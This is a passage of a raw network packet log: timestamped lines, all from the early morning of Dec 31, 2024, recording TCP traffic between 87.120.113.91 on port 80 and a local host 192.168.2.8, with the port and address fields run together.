                                                        Dec 31, 2024 09:28:27.968347073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968372107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968380928 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968389034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968420029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968427896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968437910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968447924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968457937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968487024 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968503952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968516111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968555927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968568087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968591928 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968604088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968641043 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.968669891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968682051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.968719006 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969141960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969191074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969201088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969213963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969225883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969235897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969250917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969285965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969296932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969321012 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969332933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969373941 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969393969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969403982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969409943 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969414949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969461918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969475031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969485998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969532013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969549894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969561100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969572067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969583988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.969611883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.969628096 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970101118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970118999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970129967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970169067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970176935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970187902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970197916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970216036 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970237017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970274925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970287085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970298052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970329046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970339060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970350027 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970366001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970374107 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970411062 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970433950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970444918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970454931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970468044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970504045 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970515966 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970757961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970771074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970782042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970810890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970827103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970844030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970854998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970864058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970884085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.970901012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970949888 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970961094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.970993042 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971010923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971020937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971033096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971043110 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971050978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971069098 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971172094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971183062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971194029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971204996 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971211910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971230030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971235991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971246958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971257925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971268892 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971296072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.971338034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971349001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971366882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.971389055 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973072052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973084927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973112106 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973119974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973131895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973165035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973222017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973233938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973243952 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973254919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973262072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973272085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973279953 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973315001 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973336935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973349094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973359108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973371029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.973400116 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.973419905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.111670017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116498947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116519928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116530895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116597891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116620064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116631031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116641998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116661072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116686106 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116709948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116724968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116736889 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116749048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116775990 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116796970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116873026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116883993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116894960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116906881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116918087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116924047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116934061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.116946936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116959095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.116980076 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117130995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117141962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117151976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117161989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117172003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117178917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117187977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117199898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117208004 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117227077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117398977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117409945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117423058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117429018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117434025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117439985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117444992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117449999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117456913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117463112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117474079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117502928 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117516041 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117681026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117691994 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117702961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117713928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117723942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117733002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117743015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117753029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117762089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117801905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117872000 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117889881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117902040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.117909908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.117934942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118012905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118024111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118033886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118043900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118057013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118094921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118221998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118232965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118242979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118252993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118263006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118271112 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118279934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118288040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118298054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118308067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118319035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118329048 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118356943 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118438959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118449926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118462086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118480921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118513107 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118563890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118573904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118583918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118593931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118604898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118614912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118632078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118803024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118813992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118824005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118854046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118865967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118874073 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.118952990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118963957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118974924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.118997097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119014978 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119059086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119071007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119081020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119091988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119121075 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119144917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119211912 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119223118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119232893 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119244099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119255066 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119261026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119281054 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119438887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119450092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119462967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119477034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119486094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119497061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119503975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119513988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119524956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119534969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119541883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119555950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119568110 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119595051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119715929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119726896 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119739056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119760036 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119920969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119931936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.119970083 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.119982958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120018959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120027065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120038033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120048046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120059967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120069027 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120095015 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120285988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120296001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120306015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120316029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120322943 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120332956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120346069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120351076 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120361090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120369911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120381117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120388031 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120404959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120424032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120434999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120457888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120522022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120532990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120543003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120553970 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120558977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120569944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120575905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120587111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120599031 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120871067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120881081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120893002 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.120908976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120951891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.120985985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121042013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121057987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121083975 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121165037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121176004 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121189117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121206045 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121223927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121232033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121242046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121247053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121258020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121274948 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121300936 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121309996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121393919 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121406078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121411085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121426105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121434927 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121443033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121458054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121463060 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121473074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121480942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121515989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121689081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121706009 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121716022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121726990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121737003 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121745110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121756077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121764898 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121778965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.121787071 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.121989012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122024059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122031927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122044086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122056007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122066975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122080088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122098923 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122186899 CET804970887.120.113.91192.168.2.8
